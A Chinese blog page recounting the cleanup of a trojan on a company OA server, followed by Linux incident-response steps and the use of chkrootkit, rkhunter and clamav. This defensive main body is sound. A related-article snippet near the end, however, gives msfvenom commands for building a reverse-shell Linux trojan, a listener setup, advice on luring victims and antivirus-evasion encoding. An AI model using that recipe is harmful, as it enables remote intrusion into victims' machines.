Linux查杀木马经验总结

最新推荐文章于 2025-07-16 15:03:35 发布
最新推荐文章于 2025-07-16 15:03:35 发布
阅读量1.4k 收藏 8
点赞数 4
文章标签: 木马
本文分享了一次OA服务器遭受木马攻击后的处理过程及经验总结。包括如何定位问题、采取紧急措施、查杀木马及系统加固的方法。并详细介绍了Linux环境下木马查杀的常用命令和工具。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原创作品,允许转载,转载时请务必以超链接形式标明文章  原始出处 、作者信息和本声明。否则将追究法律责任。 http://qicheng0211.blog.51cto.com/3958621/1928738

    前段时间公司网络异常,访问公网和内网都出现丢包,甚至无法访问的情况。登录网关查看监控,发现OA服务器的出方向流量异常,并连接了一个国外IP地址。

    然后想登录OA服务器排查,发现登录不上,ping丢包严重,猜测服务器的CPU、连接数或带宽被占满,导致无法登录。

    OA服务器是部署在一台Esxi上的虚拟机,Esxi主机也登录不上了,首先拔掉了Esxi的网线,阻止服务器对外发包。

    然后把网线插到了笔记本上,与Esxi服务器直连,并将笔记本设置为网关的IP192.168.1.1,这样就能ping通OA的服务器了,然后远程进去。

    经过一个上午的查杀,木马已被清除,并做好了防火墙优化、OA进程低权限运行、打安全补丁等加固措施。

    之后查找入侵的蛛丝马迹,发现黑客是通过OA软件漏洞,植入了木马程序,所有操作都记录在OA的日志里了,汗。。最后联系厂商提交了软件漏洞。

wKioL1kkCRrQOxPqAAJ1vkz9Ctg828.png-wh_50

    木马查杀只能是最后的补救手段,减少损失。最重要的还是提高安全意识,所有对外的服务器要进行系统加固、监控、操作审计、及时打补丁。博客地址:http://qicheng0211.blog.51cto.com

    下面总结一下Linux下木马查杀经验。

一、查找入侵痕迹

查看最近登录的账户和登录时间:

last,lastlog

查找远程登录成功的IP:

grep -i Accepted /var/log/secure

检查计划任务:

/var/spool/cron/

/etc/cron.hourly

/etc/crontab

通过文件状态最后修改时间来查找木马文件:

find / -ctime 1

检查/etc/passwd和/etc/shadow文件,是否有可疑用户。

检查临时目录/tmp、/vat/tmp、/dev/shm,这些目录权限是1777,容易被上传木马文件。

查看端口对外的服务日志,比如tomcat、nginx。

查看当前运行的服务:

service --status-all | grep running

查看自启动的服务:

chkconfig --list | grep :on

二、查杀木马常用命令

1. ps,top

查看运行的进程和进程系统资源占用情况,查找异常进程。

2. pstree

以树状图的形式显示进程间的关系。

3. lsof

可以查看进程打开的文件、文件或目录被哪个进程占用、打开某个端口的进程、系统所有打开的端口等等。

4. netstat

可以查看系统监听的所有端口、网络连接情况、查找连接数过多的IP地址等。

5. iftop

监控TCP连接实时网络流量,可分别分析出入流量并进行排序,查找出流量异常的IP地址。

6. nethogs

监控每个进程使用的网络流量,并从高到低排序,方便查找出流量异常的进程。

7. strace

追踪一个进程所执行的系统调用,可分析木马进程的运行情况。

8. strings

输出文件中可打印的字符串,可用来分析木马程序。

三、rootkit检测工具

    chkrootkit和rkhunter是Linux下常用的查找检测rootkit后门的工具。

1、chkrootkit

    项目主页:http://www.chkrootkit.org/

    安装chkrootkit:

# wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz

# tar zxvf chkrootkit.tar.gz

# cd chkrootkit-*

# yum install gcc gcc-c++ glibc* make

# make sense

    运行检查:

# ./chkrootkit

    chkrootkit检查使用了部分系统命令: awk, cut, egrep, find, head, id, ls, netstat, ps, strings, sed, uname。

    在被入侵的系统上这些系统命令可能已被替换,因此chkrootkit的结果将不可靠。为了避免使用这些不受信任的命令,我们可以使用'-p'选项指定命令的备用路径。

    首先在另一个干净的系统里备份依赖命令:

# mkdir /backup/commands -p

# which --skip-alias awk cut egrep find head id ls netstat ps strings sed uname | xargs -i cp {} /backup/commands

# tar cvzfP commands.tar.gz /backup/commands

    然后把压缩包上传至服务器,解压后放在/backup/commands目录下,执行检查:

# ./chkrootkit -p /backup/commands

2、rkhunter

    rkhunter具有比chrootkit更为全面的扫描范围。除rootkit特征码扫描外,rkhunter还支持端口扫描,常用开源软件版本和文件变动情况检查等。

    项目主页:http://rkhunter.sourceforge.net/

    安装rkhunter:

# wget http://downloads.sourceforge.net/project/rkhunter/rkhunter/1.4.2/rkhunter-1.4.2.tar.gz

# tar xzvf rkhunter*

# cd rkhunter*

# ./installer.sh --layout /usr --install

    更新rkhunter数据库:

# rkhunter --update

    开始检查(输出中文):

# rkhunter --lang cn -c --sk

    --rwo参数仅输出warning信息:

# rkhunter --lang cn -c --sk --rwo

    我们还可以用-l参数指定写入的日志:

# rkhunter --lang cn -c --sk -l rkhunter.log

    为干净的系统建立校对样本:

# rkhunter --propupd

    定时扫描:

0 5 * * * /usr/local/bin/rkhunter --cronjob -l --rwo

四、clamav杀毒引擎

    clamav是用于检测木马,病毒,恶意软件和其他恶意威胁的一个开源杀毒引擎。支持Windows、Linux、Mac OS X多种操作系统。

    项目地址:http://www.clamav.net/

    首先安装epel软件源:

# wget http://mirrors.sohu.com/fedora-epel/6/x86_64/epel-release-6-8.noarch.rpm

# rpm -ivh epel-release-6-8.noarch.rpm

# sed -i 's/^mirrorlist=https/mirrorlist=http/' /etc/yum.repos.d/epel.repo

# yum makecache fast

    下载安装clamav:

# yum install yum-plugin-downloadonly -y

# yum install clamav -y --downloadonly --downloaddir=./

# rpm -ivh clamav*

    clamav会在/etc/cron.daily/目录下建立自动更新病毒库的脚本,每天自动执行。

    手动更新病毒库命令:

# freshclam

    查看病毒库日期:

# clamscan -V

    使用clamav进行根目录扫描:

# clamscan -r -i / -l /tmp/clamav.log

    进一步扫描可疑目录,并移除木马文件

# clamscan -r -i /usr/bin --remove

wKioL1kj_5DDVsL2AABs6JH0mCc548.png-wh_50

-r 文件夹递归扫描

-i 仅输出受感染文件信息

-l 指定扫描日志文件路径

--move 移动受感染文件到指定目录

--remove 直接移除受感染文件

    我们还可以手动下载病毒库:

http://db.cn.clamav.net/daily.cvd 

http://db.cn.clamav.net/main.cvd 

http://db.cn.clamav.net/safebrowsing.cvd 

http://db.cn.clamav.net/bytecode.cvd

    下载后放入一个文件夹内,扫描时我们可以使用-d参数指定病毒库文件夹路径,比如:

# clamscan -r -i / -d ./clamav-db

本文出自 “启程的Linux博客” 博客,请务必保留此出处http://qicheng0211.blog.51cto.com/3958621/1928738

Linux系统病毒与木马排查清除方法
InjeProgram的博客
09-20 2135
总结起来,排查和清除Linux系统中的病毒和木马需要一系列综合性的方法和工具。更新系统和软件、使用杀毒软件、分析系统日志、检查可疑文件和进程,并采取适当的清除措施,这些都是保护Linux系统免受恶意软件威胁的重要步骤。尽管Linux上的杀毒软件相对较少,但仍然有一些可用的工具可以帮助您检测和清除病毒和木马。保持系统和软件的最新版本是防御病毒和木马的首要步骤。定期更新您的Linux发行版和安装的软件包,以确保获得最新的安全补丁和修复程序。通过检查系统中的可疑文件和进程,您可以发现潜在的病毒和木马
Linux系统木马后门查杀方法详解
01-09
木马和后门的查杀是系统管理员一项长期需要坚持的工作,切不可掉以轻心。以下从几个方面在说明Linux系统环境安排配置防范和木马后门查杀的方法:   一、Web Server(以Nginx为例)   1、为防止跨站感染,将虚拟主机目录隔离(可以直接利用fpm建立多个程序池达到隔离效果)   2、上传目录、include类的库文件目录要禁止代码执行(Nginx正则过滤)   3、path_info漏洞修正:   在nginx配置文件中增加: if ($request_filename ~* (.*).php) { set $php_url $1;          }
Linux系统木马查杀
Saindy5828的专栏
02-18 1127
查看进程打开的文件、文件或目录被哪个进程占用、打开某个端口的进程、系统所有打开的端口等信息。监控TCP连接实时网络流量,可分别分析出入流量并进行排序,查找出流量异常的IP地址。查看系统监听的所有端口、网络连接情况,查找连接数过多的IP地址等信息。监控每个进程使用的网络流量,并从高到低排序,方便查找出流量异常的进程。查看运行的进程和进程系统资源占用情况,查找异常进程。追踪一个进程执行的系统调用,分析木马进程的运行情况。以树状图的形式显示进程间的关系。使用常用木马查杀命令。
Linux应急Rootkit后门查杀&&病毒查杀软件
最新发布
chinese_cabbage0的博客
07-16 961
生产环境中建议错峰安排扫描任务,避免同时运行多个全盘扫描工具。检测rootkit、后门程序和可疑文件,通过校验和验证系统命令的完整性。检测常见rootkit和系统后门,包括隐藏进程、内核模块恶意修改等。检测隐藏进程、TCP/UDP端口和文件系统隐藏技术。开源反病毒引擎,检测恶意软件、特洛伊木马和恶意脚本。高级系统工具集(进程/内核/网络/注册表分析)企业级端点防护,提供实时威胁防护和EDR功能。支持检测wtmp/utmp日志篡改。三合一检测(进程/端口/文件系统)企业级防护方案,支持服务器和工作站。
Linux查杀***经验总结
weixin_34417200的博客
05-23 295
前段时间公司网络异常,访问公网和内网都出现丢包,甚至无法访问的情况。登录网关查看监控,发现OA服务器的出方向流量异常,并连接了一个国外IP地址。 然后想登录OA服务器排查,发现登录不上,ping丢包严重,猜测服务器的CPU、连接数或带宽被占满,导致无法登录。 OA服务器是部署在一台Esxi上的虚拟机,Esxi主机也登录不上了,首先拔掉了Esxi的网线,阻止...
Linux下简单的木马查杀
周瑜的博客
02-07 1351
最近开发服务器经常报警,作为一个安防小菜鸟。总结了以下的查杀套路以供将来参考。2021-02-07 查杀思路 先查看系统中有没有异样的进程 找到异常进程之后 kill 掉 找到异常进程启动的位置并修复 具体的查杀步骤 先看到阿里云的报警信息 其实这里阿里云的报错还是挺清晰的了,主要是因为用nexus搭建的私服被破了,然后黑客通过nexus 执行了shell命令。(第一次看到这个后一脸懵逼,不知所措) 然后通过 top 查看运行的进程 发现了异常的进程 network01 kill -9
Linux手动木马查杀过程
05-04
Linux手动木马查杀过程,处理安全问题很重要的,建议下载看看
Linux下手动查杀木马过程
吕巡鑫
03-09 917
文章目录1 使用rootkit把木马程序的父进程和木马文件隐藏 (此章节实验需在CentOS 6下进行)1.1Rootkit概述1.2实战-通过rootkit隐蔽行踪1、安装adore-ng2、测试,查看帮助:实战1:演示ava提权功能1、准备测试环境2、创建一个普通用户3、通过ava命令提权,让普通用户xinsz08可以获得root权限4、使用r命令选项提权5、在别一个终端上查看,运行此vim...
记一次手动查杀Linux服务器挖矿木马
3D的博客
01-17 2762
我实验室的座位隔壁放着一台其他课题组管理的服务器,平时利用率不高。那天我发现服务器的风扇转速拉满持续了至少一天,遂问隔壁在跑什么东西,隔壁同学在课题组问了一圈发现没人在用。两天后我恰好有点时间,帮他们在服务器上进行调查。最终发现是中了挖矿木马,进行了杀毒并把多个存在的系统漏洞都补上了。第一次手动实战查杀,故记录方法和过程。系统版本:Ubuntu 20.04 LST。
Linux查杀webshell木马的工具.zip
01-05
Linux查杀webshell木马的工具.zip
linux木马查杀工具,【Kali】linux木马查杀
weixin_42516668的博客
05-04 1122
通常系统中木马或者病毒后会有各种各样的特征异常特征:1.网络流量2.异常进程3.消耗资源,如占用CPU、内存、硬盘读写针对异常,使用适当的命令进行排查。这里以网络接口为例流量为例1、查看通信端口查找异常通信的端口、IP,并记录PID和program namenetstat -anonetstat -tnpl掌握lsof、ps命令2、确定进程路径Linux在启动一个进程时,系统会在/proc下创建一...
Linux下手动查杀木马与Rootkit的实战指南
weixin_43822401的博客
06-23 796
手动查杀Linux下的木马和Rootkit需要对系统有深入的了解和正确的工具。通过模拟攻击者的行为,我们可以更好地理解他们的技术手段,并采取相应的防御措施。攻击者可能会编写权限维持脚本,这些脚本通过父进程检测子进程的存在,如果子进程被删除,父进程将自动重启子进程。它可以扫描已知的rootkit特征码,并检查系统文件的异常属性。rkhunter将执行一系列测试,包括MD5校验、检测rootkits使用的二进制文件、特洛伊木马的特征码检测等。请注意,本文中的技术仅供教育目的,切勿用于非法活动。
服务器linux杀网页木马,一次Linux服务器木马查杀经历
weixin_42120563的博客
05-09 477
1客户自己的服务器由于种了木马,往外发送大量数据包,被服务商切断网络.虽然没有网络不能直接登录服务器,但是可以通过服务商提供的WEB控制面板进入操作系统.首先使用命令查看相关连接:netstat-natp,很明显看到了异常进程gettylsof-i:35308对应进程号,然后kill掉.使用命令last查看最近登录情况:其中有异常IP登录:60.28.121.160是天津的IP,而客户是...
Linux下手动查杀木马
菜鸟、上路
08-25 7223
一、 模拟木马程序病原体并让木马程序自动运行 黑客让脚本自动执行的三种方法: 计划任务,crontab;开机启动;系统命令被替换,使用命令后被触发。 1、 生成木马程序病原体 [root@xuegod120 ~]# vim /usr/bin/fregonnzkq #!/bin/bash touch /tmp/aaa.txt while true do echo date >> /tmp...
Linux查杀木马常用命令
nece001的专栏
02-21 1579
先进行检查: 根据top命令查看当前进程,找到可疑进程的进程号和运行的用户 去/proc目录下对应的进程号目录,查看exe文件对应的目录 (今天发现的是pscan2这个木马,启动用户是tel) 着手处理 1、停止用户tel所有进程 #pkill -9 -U tel 2、删除用户tel #userdel tel 其它可能有用的命令 停止名为scanssh的所有进程 #pkill -9 ...
木马入侵查杀 linux
weixin_30598225的博客
12-18 279
目 录: 一、问题现象: 二、问题排查: 1、netstat 排查: 2、top查看: 3、lsof -c 命令排查: 4、确定中木马了。 三、木马查杀木马1,清除: 木马2,清除: 四、后续处理: 1、iptables检查 2、cron检查 3、chkconfig检查 4、木马删除,持续观察确认 五、入侵原因及后续避免措施: 1、入侵原因: 2、后续避...
【转】记一次Linux木马清除过程
tpriwwq的专栏
10-07 1720
Linux下一次典型的木马清除过程 包含很多实用技巧,运维必备
Linux木马病毒处理
小树苗
10-13 4661
如果是云服务器可以在云监控态势与感知中直接获取木马文件相关进程name,id以及路径如下: 文件路径: /opt/apache-tomcat-7.0.104/bin/shell1.elf 恶意文件md5: 91cc7f105856a0e9eb6a29ef3d08d9ce 进程id: 27504 如果是物理机需要仔细去终端排查; top #仔细检查异常进程pid ls -l /proc/pid/exe #查看异常进程命令所在地 严重的时候木马病毒会修改或替换平时常用的系统命令 ps,ls等命令执行无..
Linux服务器挖矿木马病毒查杀记录(-bash mcrond bprofr pwnrig ntpdate dbused sysdr)
jackhanyuan的博客
10-09 2797
近期,服务器异常,通过htop或top命令查看CPU占用前几的进程,发现root用户的-bash进程把CPU一半的核占满,而另一台服务器上x用户(被新创建的用户)和一个普通用户CPU占用也异常。杀掉进程后立马又启动了新进程,查看PID目录,可以看到exe指向了一个被删除了的-bash进程(/usr/bin/-bash),使用查看State为的网络连接,发现有异常外网连接这应该就是-bash病毒木马了。
metasploit创建linux木马
03-25
### 如何使用 Metasploit 创建 Linux 木马 Payload 创建针对 Linux 系统的木马 Payload 是渗透测试中的一个重要环节。以下是关于如何利用 Metasploit 框架生成适用于 Linux 的恶意软件的具体方法。 #### 使用 `msfvenom` 命令生成 Linux Payload Metasploit 提供了一个强大的工具 `msfvenom`,用于生成各种类型的 Payload。对于 Linux 系统,可以生成 ELF 文件作为目标机器上的可执行程序。以下是一个典型的命令结构: ```bash msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<本地IP> LPORT=<端口号> -f elf > shell.elf ``` 此命令解释如下: - `-p`: 指定要使用的 Payload 类型,在这里是 `linux/x86/meterpreter/reverse_tcp`[^1]。 - `LHOST`: 定义攻击者控制的服务器 IP 地址。 - `LPORT`: 设定反向连接的目标端口。 - `-f`: 输出格式设置为 ELF (Executable and Linkable Format),这是 Linux 平台的标准二进制文件格式。 - `shell.elf`: 最终生成的木马文件名。 #### 配置 Exploit Handler 来接收连接 一旦生成了 Payload,还需要配置一个 handler 来捕获来自受害者的连接请求。这可以通过启动 `multi/handler` exploit 实现: ```plaintext use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set lhost <本地IP> exploit ``` 上述脚本的作用在于初始化一个多用途处理器模块,并设定相同的 Payload 参数以便于匹配之前生成的木马行为特征[^3]。 #### 社会工程学的应用 为了使该木马生效,通常需要借助社会工程学技巧诱导受害者运行所生成的恶意文件。例如伪装成合法应用程序或更新包等形式分发给目标用户下载并安装[^2]。 #### 注意事项与规避检测技术 为了避免被现代防病毒软件轻易识别删除掉这些自定义制作出来的威胁样本,则可能需要用到 evasion 技术进一步加工处理原始输出成果物使其更加隐蔽难以察觉。 ```python import os os.system('msfvenom -p linux/x86/shell_reverse_tcp LHOST=your_ip LPORT=port_no -e x86/shikata_ga_nai -i 5 -f elf > evil_shell.elf') ``` 以上 Python 脚本展示了如何结合编码器选项 (`-e`) 和迭代次数参数(`-i`) 对最终产物进行混淆加密操作从而提高绕过防御机制的成功率。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值